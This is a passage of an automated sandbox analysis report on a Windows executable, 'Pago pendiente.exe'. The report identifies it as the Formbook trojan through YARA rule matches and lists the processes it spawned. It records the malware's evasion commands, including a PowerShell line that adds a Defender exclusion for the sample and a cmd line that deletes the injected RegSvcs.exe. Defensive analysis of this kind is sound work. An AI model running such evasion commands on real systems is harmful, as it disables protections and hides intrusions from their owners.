          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A9E607_2_025A9E60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A2FB07_2_025A2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BECEE7_2_025BECEE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A2D907_2_025A2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A2D887_2_025A2D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01475130 appears 58 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014BF290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014AEA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01487E54 appears 111 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0142B970 appears 280 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0486F290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 047DB970 appears 280 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04825130 appears 58 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0485EA12 appears 86 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04837E54 appears 111 times
          Source: Pago pendiente.exe, 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2008580882.00000000032D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2006528335.000000000130E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2016169605.0000000005300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2020493928.0000000007700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exeBinary or memory string: OriginalFilenameJOoy.exeB vs Pago pendiente.exe
          Source: Pago pendiente.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4458911697.000000000E4E6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: Process Memory Space: Pago pendiente.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1644, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Pago pendiente.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, IQKgXNAjhiaS4o0dDr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, IQKgXNAjhiaS4o0dDr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, IQKgXNAjhiaS4o0dDr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.csSecurity API names: _0020.AddAccessRule
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/6@12/3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000638B0 HeapSetInformation,StrCmpICW,CompareStringOrdinal,CompareStringOrdinal,CoTaskMemFree,StrCmpICW,IsOS,CompareStringOrdinal,StrCmpICW,StrCmpICW,lstrlenW,AllowSetForegroundWindow,ShellExecuteExW,CoInitializeEx,CoCreateInstance,CoUninitialize,7_2_000638B0
          Source: C:\Users\user\Desktop\Pago pendiente.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Pago pendiente.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iofqxz1p.z2x.ps1Jump to behavior
          Source: Pago pendiente.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Pago pendiente.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Pago pendiente.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Pago pendiente.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\Pago pendiente.exeFile read: C:\Users\user\Desktop\Pago pendiente.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Pago pendiente.exe "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
